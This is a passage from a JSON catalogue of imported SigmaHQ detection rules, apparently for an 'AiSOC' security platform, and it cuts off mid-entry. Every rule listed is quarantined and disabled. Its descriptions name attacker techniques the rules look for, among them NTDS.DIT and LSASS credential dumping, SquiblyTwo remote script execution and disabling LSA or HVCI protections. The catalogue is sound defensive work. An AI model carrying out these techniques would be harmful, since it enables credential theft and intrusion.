"FortiGate - VPN SSL Settings Modified", "description": "Detects the modification of VPN SSL Settings (for example, the modification of authentication rules).\nThis behavior was observed in pair with the addition of a VPN SSL Web Portal.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-vpn-ssl-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b5dacf2-aeb7-459d-b133-678eb696d410", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_vpn_ssl_settings_modified.yml" } }, { "id": "sigmahq-sigma-8b69fd42-9dad-4674-abef-7fdef43ef92a", "type": "detection", "name": "DNS Query To Put.io - DNS Client", "description": "Detects DNS queries for subdomains related to \"Put.io\" sharing website.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-to-put-io-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b69fd42-9dad-4674-abef-7fdef43ef92a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/dns_client/win_dns_client_put_io.yml" } }, { "id": "sigmahq-sigma-8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "type": "detection", "name": "Windows Hypervisor Enforced Code Integrity Disabled", "description": "Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the \"Enabled\" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-hypervisor-enforced-code-integrity-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b7273a4-ba5d-4d8a-b04f-11f2900d043a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml" } }, { "id": "sigmahq-sigma-8b93a509-1cb8-42e1-97aa-ee24224cdc15", "type": "detection", "name": "Sensitive File Dump Via Wbadmin.EXE", "description": "Detects the dump of highly sensitive files such as \"NTDS.DIT\" and \"SECURITY\" hive.\nAttackers can leverage the \"wbadmin\" utility in order to dump sensitive files that might contain credential or sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, 
"path": "detections/sigma-imports/_quarantine/sensitive-file-dump-via-wbadmin-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b93a509-1cb8-42e1-97aa-ee24224cdc15", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml" } }, { "id": "sigmahq-sigma-8b9606c9-28be-4a38-b146-0e313cc232c1", "type": "detection", "name": "Potential Ransomware Activity Using LegalNotice Message", "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ransomware-activity-using-legalnotice-message.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8b9606c9-28be-4a38-b146-0e313cc232c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml" } }, { "id": "sigmahq-sigma-8bc063d5-3a3a-4f01-a140-bc15e55e8437", "type": "detection", "name": "Suspicious GetTypeFromCLSID ShellExecute", "description": "Detects suspicious Powershell code that execute COM Objects", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-gettypefromclsid-shellexecute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" } }, { "id": "sigmahq-sigma-8bc64091-6875-4881-aaf9-7bd25b5dda08", "type": "detection", "name": "Suspicious Process Patterns NTDS.DIT Exfil", "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-patterns-ntds-dit-exfil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_ntds.yml" } }, { "id": "sigmahq-sigma-8c0eca51-0f88-4db2-9183-fdfb10c703f9", "type": "detection", "name": "LSA PPL Protection Setting Modification via CommandLine", "description": "Detects modification of 
LSA PPL protection settings via CommandLine.\nIt may indicate an attempt to disable protection and enable credential dumping tools to access LSASS process memory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1689" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsa-ppl-protection-setting-modification-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lsa_ppl_protection_setting_modification_via_cli.yml" } }, { "id": "sigmahq-sigma-8c1a5675-cb85-452f-a298-b01b22a51856", "type": "detection", "name": "Suspicious Invocation of Shell via AWK - Linux", "description": "Detects the execution of \"awk\" or it's sibling commands, to invoke a shell using the system() function.\nThis behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-invocation-of-shell-via-awk-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"8c1a5675-cb85-452f-a298-b01b22a51856", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_awk_shell_spawn.yml" } }, { "id": "sigmahq-sigma-8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "type": "detection", "name": "New Outlook Macro Created", "description": "Detects the creation of a macro file for Outlook.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-outlook-macro-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml" } }, { "id": "sigmahq-sigma-8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "type": "detection", "name": "Active Directory Group Enumeration With Get-AdGroup", "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/active-directory-group-enumeration-with-get-adgroup.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" } }, { "id": "sigmahq-sigma-8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "type": "detection", "name": "Creation Exe for Service with Unquoted Path", "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/creation-exe-for-service-with-unquoted-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml" } }, { "id": "sigmahq-sigma-8c521530-5169-495d-a199-0a3a881ad24e", "type": "detection", "name": "NTFS Alternate Data Stream", "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntfs-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c521530-5169-495d-a199-0a3a881ad24e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" } }, { "id": "sigmahq-sigma-8c6ec464-4ae4-43ac-936a-291da66ed13d", "type": "detection", "name": "Roles Are Not Being Used", "description": "Identifies when a user has been assigned a privilege role and are not using that role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-are-not-being-used.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c6ec464-4ae4-43ac-936a-291da66ed13d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml" } }, { "id": "sigmahq-sigma-8c944ecb-6970-4541-8496-be554b8e2846", "type": "detection", "name": "Successful Authentications From 
Countries You Do Not Operate Out Of", "description": "Detect successful authentications from countries you do not operate out of.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/successful-authentications-from-countries-you-do-not-operate-out-of.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8c944ecb-6970-4541-8496-be554b8e2846", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" } }, { "id": "sigmahq-sigma-8ca7004b-e620-4ecb-870e-86129b5b8e75", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - System", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml" } }, { "id": "sigmahq-sigma-8cbc9475-8d05-4e27-9c32-df960716c701", "type": "detection", "name": "Potentially Suspicious Desktop Background Change Using Reg.EXE", "description": "Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1491.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-desktop-background-change-using-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cbc9475-8d05-4e27-9c32-df960716c701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml" } }, { "id": "sigmahq-sigma-8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "type": "detection", "name": "Bitsadmin to Uncommon IP Server Address", "description": "Detects Bitsadmin connections to IP addresses instead of FQDN names", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitsadmin-to-uncommon-ip-server-address.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8ccd35a2-1c7c-468b-b568-ac6cdf80eec3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_bitsadmin_susp_ip.yml" } }, { "id": "sigmahq-sigma-8cd538a4-62d5-4e83-810b-12d41e428d6e", "type": "detection", "name": "Processes Accessing the Microphone and Webcam", "description": "Detects processes accessing the microphone and webcam on an endpoint, which may indicate an adversary capturing audio or video.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/processes-accessing-the-microphone-and-webcam.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_camera_microphone_access.yml" } }, { "id": "sigmahq-sigma-8cde342c-ba48-4b74-b615-172c330f2e93", "type": "detection", "name": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-renamed-comsvcs-dll-loaded-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8cde342c-ba48-4b74-b615-172c330f2e93", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" } }, { "id": "sigmahq-sigma-8d01b53f-456f-48ee-90f6-bc28e67d4e35", "type": "detection", "name": "Suspicious Obfuscated PowerShell Code", "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-obfuscated-powershell-code.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml" } }, { "id": "sigmahq-sigma-8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "type": "detection", "name": "Bad Opsec Powershell Code Artifacts", "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads\nthat often undergo 
minimal changes by attackers due to bad opsec.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bad-opsec-powershell-code-artifacts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" } }, { "id": "sigmahq-sigma-8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "type": "detection", "name": "Wmiexec Default Output File", "description": "Detects the creation of the default output filename used by the wmiexec tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmiexec-default-output-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" } }, { "id": "sigmahq-sigma-8d63dadf-b91b-4187-87b6-34a1114577ea", "type": "detection", "name": "Potential 
Remote SquiblyTwo Technique Execution", "description": "Detects potential execution of the SquiblyTwo technique that leverages Windows Management Instrumentation (WMI)\nto execute malicious code remotely. This technique bypasses application whitelisting by using wmic.exe to process\nmalicious XSL (eXtensible Stylesheet Language) scripts that can contain embedded JScript or VBScript.\nThe attack typically works by fetching XSL content from a remote source (using HTTP/HTTPS) and executing it\nwith full trust privileges directly in memory, avoiding disk-based detection mechanisms. This is a common\nLOLBin (Living Off The Land Binary) technique used for defense evasion and code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1220", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remote-squiblytwo-technique-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d63dadf-b91b-4187-87b6-34a1114577ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" } }, { "id": "sigmahq-sigma-8d7e392e-9b28-49e1-831d-5949c6281228", "type": "detection", "name": "Network Connection Initiated By IMEWDBLD.EXE", "description": "Detects a network connection initiated by IMEWDBLD.EXE. 
This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-by-imewdbld-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d7e392e-9b28-49e1-831d-5949c6281228", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_imewdbld.yml" } }, { "id": "sigmahq-sigma-8d85cf08-bf97-4260-ba49-986a2a65129c", "type": "detection", "name": "Suspicious PowerShell In Registry Run Keys", "description": "Detects potential PowerShell commands or code within registry run keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-in-registry-run-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d85cf08-bf97-4260-ba49-986a2a65129c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" } }, { "id": 
"sigmahq-sigma-8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12", "type": "detection", "name": "Unsigned or Unencrypted SMB Connection to Share Established", "description": "Detects SMB server connections to shares without signing or encryption enabled.\nThis could indicate potential lateral movement activity using unsecured SMB shares.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-or-unencrypted-smb-connection-to-share-established.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/smbserver/connectivity/win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml" } }, { "id": "sigmahq-sigma-8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "type": "detection", "name": "Whoami.EXE Execution Anomaly", "description": "Detects the execution of whoami.exe with suspicious parent processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/whoami-exe-execution-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_whoami_parent_anomaly.yml" } }, { "id": "sigmahq-sigma-8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "type": "detection", "name": "Suspicious WindowsTerminal Child Processes", "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windowsterminal-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" } }, { "id": "sigmahq-sigma-8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "type": "detection", "name": "User State Changed From Guest To Member", "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-state-changed-from-guest-to-member.yaml", 
